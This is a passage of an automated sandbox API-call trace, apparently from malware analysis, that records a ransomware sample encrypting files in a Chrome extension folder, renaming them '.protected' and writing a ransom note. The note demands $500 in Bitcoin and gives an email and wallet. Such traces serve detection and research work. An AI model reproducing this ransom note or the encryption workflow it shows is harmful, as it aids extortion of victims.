lpOverlapped=0x0 | out: lpBuffer=0x295db5c*, lpNumberOfBytesWritten=0x295db84*=0x4, lpOverlapped=0x0) returned 1 [0083.219] WriteFile (in: hFile=0x164, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, 
lpNumberOfBytesWritten=0x295db84*=0x30, lpOverlapped=0x0) returned 1 [0083.219] CloseHandle (hObject=0x164) returned 1 [0083.219] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.html.protected") returned 178 [0083.219] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.html"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.html.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.html.protected")) returned 1 [0083.220] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.220] lstrcmpiW (lpString1="view.js", lpString2="Windows") returned -1 [0083.220] lstrcmpiW (lpString1="view.js", lpString2="Program Files") returned 1 [0083.220] lstrcmpiW (lpString1="view.js", lpString2="Program Files (x86)") returned 1 [0083.220] lstrcmpiW (lpString1="view.js", lpString2="$Recycle.bin") returned 1 [0083.220] lstrcmpiW (lpString1="view.js", lpString2="System Volume Information") returned 1 [0083.220] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.js") returned 166 [0083.220] StrStrIW (lpFirst="view.js", lpSrch=".protected") returned 0x0 [0083.220] lstrcmpW (lpString1="view.js", lpString2="RESTORE_FILES.txt") returned 1 [0083.221] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295db3c | out: pbBuffer=0x295db3c) returned 1 [0083.221] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295db64*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295db64*=0x30) returned 1 [0083.221] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.222] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.js") returned 166 [0083.222] StrStrW (lpFirst="view.js", lpSrch=".txt") returned 0x0 [0083.222] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.js") returned 166 [0083.222] StrStrW (lpFirst="view.js", lpSrch=".rar") returned 0x0 [0083.222] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.js") returned 166 [0083.222] 
StrStrW (lpFirst="view.js", lpSrch=".zip") returned 0x0 [0083.222] ReadFile (in: hFile=0x164, lpBuffer=0xd010e0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesRead=0x295db84*=0x945, lpOverlapped=0x0) returned 1 [0083.234] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0xfffff6bb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.234] WriteFile (in: hFile=0x164, lpBuffer=0xd010e0*, nNumberOfBytesToWrite=0x945, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesWritten=0x295db84*=0x945, lpOverlapped=0x0) returned 1 [0083.234] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.234] WriteFile (in: hFile=0x164, lpBuffer=0x295db5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x295db5c*, lpNumberOfBytesWritten=0x295db84*=0x4, lpOverlapped=0x0) returned 1 [0083.234] WriteFile (in: hFile=0x164, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295db84*=0x30, lpOverlapped=0x0) returned 1 [0083.234] CloseHandle (hObject=0x164) returned 1 [0083.234] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.js.protected") returned 176 [0083.234] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user 
data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.js"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.js.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.js.protected")) returned 1 [0083.235] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 0 [0083.235] FindClose (in: hFindFile=0x47bbd0 | out: hFindFile=0x47bbd0) returned 1 [0083.236] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\RESTORE_FILES.txt") returned 176 [0083.236] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0083.238] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.238] WriteFile (in: hFile=0x160, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295db84*=0x53d, lpOverlapped=0x0) returned 1 [0083.239] lstrlenA 
(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0083.239] WriteFile (in: hFile=0x160, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295db84*=0x2ac, lpOverlapped=0x0) returned 1 [0083.239] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0083.239] WriteFile (in: hFile=0x160, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295db84*=0xb1, lpOverlapped=0x0) returned 1 [0083.239] CloseHandle (hObject=0x160) returned 1 [0083.239] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0083.239] lstrcmpiW (lpString1="common.js", lpString2="Windows") returned -1 [0083.239] lstrcmpiW (lpString1="common.js", lpString2="Program Files") returned -1 [0083.239] lstrcmpiW (lpString1="common.js", lpString2="Program Files (x86)") returned -1 [0083.239] lstrcmpiW (lpString1="common.js", lpString2="$Recycle.bin") returned 1 [0083.239] lstrcmpiW (lpString1="common.js", lpString2="System Volume Information") 
returned -1 [0083.239] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\common.js") returned 148 [0083.239] StrStrIW (lpFirst="common.js", lpSrch=".protected") returned 0x0 [0083.239] lstrcmpW (lpString1="common.js", lpString2="RESTORE_FILES.txt") returned -1 [0083.239] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0083.239] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0083.239] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\common.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\common.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0083.240] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\common.js") returned 148 [0083.240] StrStrW (lpFirst="common.js", lpSrch=".txt") returned 0x0 [0083.240] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\common.js") returned 148 [0083.240] StrStrW (lpFirst="common.js", lpSrch=".rar") returned 0x0 [0083.240] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\common.js") returned 148 [0083.240] StrStrW (lpFirst="common.js", lpSrch=".zip") returned 0x0 [0083.240] ReadFile (in: hFile=0x160, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0083.247] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.247] WriteFile (in: hFile=0x160, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0083.248] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.248] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0083.248] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0083.248] CloseHandle (hObject=0x160) returned 1 [0083.248] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\common.js.protected") returned 158 [0083.248] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\common.js" (normalized: "c:\\users\\5p5nrgjn0js 
halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\common.js"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\common.js.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\common.js.protected")) returned 1 [0083.249] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0083.249] lstrcmpiW (lpString1="feedback.css", lpString2="Windows") returned -1 [0083.249] lstrcmpiW (lpString1="feedback.css", lpString2="Program Files") returned -1 [0083.249] lstrcmpiW (lpString1="feedback.css", lpString2="Program Files (x86)") returned -1 [0083.249] lstrcmpiW (lpString1="feedback.css", lpString2="$Recycle.bin") returned 1 [0083.249] lstrcmpiW (lpString1="feedback.css", lpString2="System Volume Information") returned -1 [0083.249] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.css") returned 151 [0083.249] StrStrIW (lpFirst="feedback.css", lpSrch=".protected") returned 0x0 [0083.249] lstrcmpW (lpString1="feedback.css", lpString2="RESTORE_FILES.txt") returned -1 [0083.249] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0083.249] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0083.249] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.css" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0083.250] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.css") returned 151 [0083.250] StrStrW (lpFirst="feedback.css", lpSrch=".txt") returned 0x0 [0083.250] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.css") returned 151 [0083.250] StrStrW (lpFirst="feedback.css", lpSrch=".rar") returned 0x0 [0083.250] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.css") returned 151 [0083.250] StrStrW (lpFirst="feedback.css", lpSrch=".zip") returned 0x0 [0083.250] ReadFile (in: hFile=0x160, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ddf4*=0xc26, lpOverlapped=0x0) returned 1 [0083.251] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xfffff3da, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.252] WriteFile (in: hFile=0x160, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0xc26, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ddf4*=0xc26, lpOverlapped=0x0) returned 1 [0083.252] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, 
lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.252] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0083.252] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0083.252] CloseHandle (hObject=0x160) returned 1 [0083.252] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.css.protected") returned 161 [0083.252] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.css" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.css"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.css.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.css.protected")) returned 1 [0083.253] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0083.253] lstrcmpiW (lpString1="feedback.html", lpString2="Windows") returned -1 [0083.253] lstrcmpiW (lpString1="feedback.html", lpString2="Program Files") returned -1 [0083.253] lstrcmpiW (lpString1="feedback.html", 
lpString2="Program Files (x86)") returned -1 [0083.253] lstrcmpiW (lpString1="feedback.html", lpString2="$Recycle.bin") returned 1 [0083.253] lstrcmpiW (lpString1="feedback.html", lpString2="System Volume Information") returned -1 [0083.253] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.html") returned 152 [0083.253] StrStrIW (lpFirst="feedback.html", lpSrch=".protected") returned 0x0 [0083.253] lstrcmpW (lpString1="feedback.html", lpString2="RESTORE_FILES.txt") returned -1 [0083.253] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0083.253] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0083.253] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0083.254] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.html") returned 152 [0083.254] StrStrW (lpFirst="feedback.html", lpSrch=".txt") returned 0x0 [0083.254] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.html") returned 152 [0083.254] StrStrW (lpFirst="feedback.html", lpSrch=".rar") returned 0x0 [0083.254] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.html") returned 152 [0083.254] StrStrW (lpFirst="feedback.html", lpSrch=".zip") returned 0x0 [0083.254] ReadFile (in: hFile=0x160, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0083.258] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.258] WriteFile (in: hFile=0x160, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0083.258] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.258] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, 